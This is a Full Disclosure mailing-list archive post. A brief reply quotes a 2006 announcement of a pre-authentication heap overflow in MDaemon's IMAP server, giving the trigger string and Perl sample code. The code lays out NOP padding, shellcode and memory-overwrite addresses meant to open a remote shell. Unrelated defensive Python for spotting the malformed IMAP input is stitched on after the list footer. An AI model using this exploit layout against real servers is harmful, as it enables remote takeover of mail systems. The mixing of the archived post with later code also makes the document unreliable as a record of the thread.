Full Disclosure mailing list archives
Re: *zeroday warez* MDAEMON LATEST VERSION PREAUTH REMOTE ROOT HOLE *zeroday warez*
From: "ad () heapoverflow com" <ad () heapoverflow com>
Date: Sun, 28 May 2006 15:39:37 +0200
If this is about "how to ruin a discovery", you do excel, dude. Keep it up.

kcope wrote:
MDAEMON LATEST VERSION PREAUTH *REMOTE ROOT HOLE* zeroday
discovered by kcope kingcope[at]gmx.net !!!
shouts to alex,wY!,bogus,revoguard,adizeone

Description

There's a remotely exploitable preauthentication hole in Alt-N MDaemon. It is a heap overflow in the IMAP daemon. It can be triggered by sending the following attack string:

a001 "[X]\r\n

Look specifically at the ", it is important :)
[X] consists of e.g. 99555 Z's to reach the 4 byte overwrite. Now one can use the 4 byte overwrite in some PEB pointer overwrite to open a remote shell. UnhandledExceptionFilter is also possible I think. No exploit is delivered at this time, figure it out yourself (use the PEB Lock) :)

Sample code:

$where = "\x4c\x14\xed\x77"; # UnhandledExceptionFilter 77ED144C
#$where = "\x20\xf0\xfd\x7f"; # PEB Lock Pointer 7FFDF000
$what = "\x3d\xb9\x82\x02"; # JMP EDX 03bfcb9A
$nops = "A" x 100;
$a = $nops . $shellcode . ("Z" x (0x2006-length($shellcode)-length($nops))) . $what . $where . ("Z" x (0x184AC - 0x200A - 12));
print $sock "a001 \"$a\r\n";
close($sock);

Best Regards,
kcope

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
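As an added defensive example (not part of either post, and not MDaemon's code), a small Python check that classifies IMAP command lines the way a protocol-aware proxy or IDS preprocessor might, flagging the shape the post describes: a tagged command whose double-quoted argument is never closed before CRLF, or a line over an assumed length threshold. The sample lines, the 8192-byte threshold and the function names are assumptions made for the example.

```python
import re

# Constructed sample IMAP client lines (not taken from the original post).
# The third has the shape of the trigger described above: tag, space, an
# opening double quote, then a very long run with no closing quote before CRLF.
SAMPLE_LINES = [
    b'a001 LOGIN "alice" "s3cret"\r\n',
    b'a002 LIST "" "*"\r\n',
    b'a003 "' + b'Z' * 99555 + b'\r\n',
    b'a004 SELECT "INBOX\r\n',
]

TAGGED_RE = re.compile(rb'^([A-Za-z0-9]+) (.*)\r\n\Z', re.DOTALL)
MAX_LINE_LEN = 8192  # assumed policy threshold, not a value from the post


def unterminated_quote(args: bytes) -> bool:
    """True if a double-quoted string opened in args is never closed.
    Backslash escapes inside a quoted string (RFC 3501 quoted-specials) are skipped."""
    in_quote = False
    i = 0
    while i < len(args):
        c = args[i:i + 1]
        if in_quote and c == b'\\':
            i += 2  # skip the escaped character
            continue
        if c == b'"':
            in_quote = not in_quote
        i += 1
    return in_quote


def classify_line(line: bytes, max_len: int = MAX_LINE_LEN) -> str:
    """Return 'ok', 'malformed', 'unterminated-quote' or 'oversized' for one line.
    The open-quote state is checked before length because that is the parser
    condition the post singles out, independent of the size used to reach it."""
    m = TAGGED_RE.match(line)
    if not m:
        return "malformed"
    if unterminated_quote(m.group(2)):
        return "unterminated-quote"
    if len(line) > max_len:
        return "oversized"
    return "ok"
```

A long but properly closed quoted string is reported only as oversized, so the two verdicts can be alerted on at different severities.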